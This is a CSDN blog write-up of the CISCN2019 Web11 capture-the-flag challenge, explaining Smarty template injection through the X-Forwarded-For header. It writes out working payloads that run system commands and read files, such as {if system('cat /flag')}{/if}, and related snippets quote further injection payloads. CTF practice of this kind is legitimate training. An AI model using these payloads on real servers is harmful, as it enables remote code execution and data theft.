[CISCN2019 华东南赛区]Web11

最新推荐文章于 2024-04-07 22:19:05 发布
最新推荐文章于 2024-04-07 22:19:05 发布
阅读量301 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: web CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/117674420
版权

知识点:smarty模板注入

解题过程:

打开容器后,是个这样的界面,注意最下面的Build With Smarty! , 猜测是smarty模板注入。
在这里插入图片描述测试模板注入,用bp抓包,然后插入X-Forwarded-For:{$smarty.version}
在这里插入图片描述回显,版本为3.1.30,说明是smarty模板注入
同时回显中也可发现,php版本是7.3.5,那么这样的话<script language="php">phpinfo();</script> ,就无法使用
同时smarty的版本是3,所以{php}{/php}也无法使用。
但是smarty的if标签也可以执行php代码
payload1:

{if readfile('/flag')}{/if}

在这里插入图片描述
payload2:

{if system('cat /flag')}{/if}

在这里插入图片描述

Sk1y
关注
专栏目录
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生的信息安全技能,...
xctf smarty
weixin_51861515的博客
11-06 252
打开网址 简单分析一波 有Current IP和X-Forwarded-For,题目处提示模板注入和smarty,所以下手的地方大概率是X-Forwarded-For模板注入了。 bp抓包来一下 Current IP:127.0.0.1,发生变化了。 来一下{{7*'7'}} 发现可以注入,继续{{system('ls')}}。 哦豁,,试一下{{phpinfo()}}。 执行了,看一下配置。 disable_functions,基本操作。 用无...
CISCN2019web刷题记录
最新发布
m0_73239569的博客
04-07 1332
考虑能将某种进制的数字字符串转换成特定字符串的函数,类似hex2bin(),因为 hex2bin() 接收的十六进制数字字符串("5f474554")可以由整型数字(1598506324)通过 dechex() 函数转换得到,而 hex2bin() 返回一个特定的字符串。,模板引擎的作用就是分离前端页面和数据的,题目中显示API的URL由于环境的原因无法使用,但我们的IP依旧显示在了页面的右上角,且根据它的提示XFF我们很容易想到,在X-Forwarded-For里构造ssti:payload。
BUUCTF-The mystery of ip【Smarty-SSTI模板注入】
sGanYu
10-07 1162
当点击flag的时候,弹出ip地址 怀疑需要利用X-Forwarded-For伪造127.0.0.1绕过 使用bp抓包,增加X-Forwarded-For:127.0.0.1,重放 似乎只是将ip回显?通过XFF头来获取信息的,这个IP的值受XFF头控制 。将XFF头改为{2*2}会发现该位置的值变为了4,便可以确定这里存在SSTI payload:X-Forwarded-For:127.0.0.1{system("ls")} 查看当前目录下的flag.php内是否藏有flag,可..
卫生CTF 2021 Web
feng的博客
07-11 1460
前言 比赛是第二届全国卫生健康行业网络安全技能大赛,赛后借了个账号复现了一下Web题,整体偏简单叭,做到CMS那题的时候环境关了。 签到 f12,拿到flag。 easy_web1 f12发现There_is_no_flag_here.php,再f12提示本地访问: Client-ip:127.0.0.1 即可得到flag。 easy_web2 ctfshow上的原题,直接打了: ?shell=/???/????64 /???????? 然后base64解码即可。 super_hacker Via 头
BUUCTF-WEBCISCN2019 华东赛区Web11 1
qq_36410265的博客
02-08 330
其实打开这张页面,我并不知道这道题是什么类型。只好先用bp去请求这两个接口。请求xff的时候,我添加了 xff头,值为127.0.0.1。回显了127.0.0.1。我就猜到是模板注入题了,加上页面上的关键字。,Smarty模板注入题,找了几个payload,没什么过滤,直接就回显了。以为这道题跟ikun那道题一样,考的知识点很多,是我想得复杂了。
华东师范大学2019计算机考研839试卷及答案(2019年839回忆版)
01-07
### 华东师范大学2019计算机考研839试卷及答案解析 #### 一、问答题 **题目:**举例说明内部链接与外部链接的区别。 **知识点:** 1. **内部链接:**指的是网站内部页面之间的链接关系,即一个网页指向同一网站中...
华东交通大学2013-2019年数据结构.pdf
10-25
华东交通大学2013-2019年数据结构.pdf
第九届飞思卡尔摄像头华东赛区一等奖程序
08-24
在本项目中,参赛团队成功地获得了第九届飞思卡尔智能车竞赛华东赛区的一等奖,这是一个高度技术性的比赛,展示了团队在嵌入式系统设计和自动驾驶技术方面的卓越能力。主控芯片选择的是K60,这是一款由NXP(原...
【第十六届全国大学生智能车竞赛回顾——华东赛区(单车拉力组)全国二等奖】设计资料
08-05
本资料包含本组制作的参考资料、程序、PCB工程文件、3D打印文件以及匿名上位机软件。可供需要的同学学习使用,如有问题,也欢迎在文章评论区留言交流。谢谢。文章链接:...
2019华东师范大学-计科与软院软件工程非全录取名单.pdf
11-14
从提供的文件信息中,可以提取出关于华东师范大学计算机科学与软件工程学院软件工程专业2019年非全日制研究生录取名单的相关知识点。这些内容涉及到的主要知识点包括: 1. 华东师范大学简介: 华东师范大学是中国...
华东师范大学计算机考研复试机试习题
03-19
华东师范大学计算机考研复试的机试环节涉及历年真题,这些题目不仅对于计算机系和数据学院的学生具有针对性,软件学院的学生同样可以参考。题目通常涵盖了计算机科学与技术领域的多个方面,包括编程能力测试、算法...
华东师范大学2019年毕业生就业质量报告.pdf
04-12
华东师范大学2019年毕业生就业质量报告.pdf
华东理工大学2019年毕业生就业质量报告.pdf
04-12
华东理工大学2019年毕业生就业质量报告.pdf
【BUUCTF】[CISCN2019 华东赛区]Double Secret
aoao331198的博客
04-22 1863
尝试/secret ?secret=1 输入长一点 发现出现了报错,这个页面是flask应用开启了debug模式后运行出错的表现,在较老版本的flask中可以直接在这个页面中打开python控制台运行代码,而在较新版本的flask中要打开python控制台需要输入一个pin码 仔细观察报错,不难发现一处引人注目,单独拎出来审计代码 if(secret==None): return 'Tell me your secret.I will encrypt it so others ca.
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2842
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
[CISCN2019 华东赛区]Double Secret
怪味巧克力的博客
07-18 1568
0x01 进入页面如下 提示我们寻找secret,再加上题目的提示,猜测这里有secret页面,我们尝试访问,结果如下 根据它这个话的意思,是让我们传参,然后它会给你加密,我们试一下 发现输入的1变成了d,我们尝试增加输入参数的长度,然后就出现了下图的结果 报错了,直接源码泄露,然后我们看一下标记处 0x02 代码如下: File "/app/app.py", line 35, in secret if(secret==None): return 'Tell me you
华东师范大学2019计算机技术839真题及答案解析
"华东师范大学2019年计算机技术(085211)839考研真题及部分答案,包含问答题、编程题,涉及指针、字符串操作、递归、函数指针、定积分计算以及二维点排序算法。" 这篇文档主要包含了华东师范大学2019年计算机技术...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值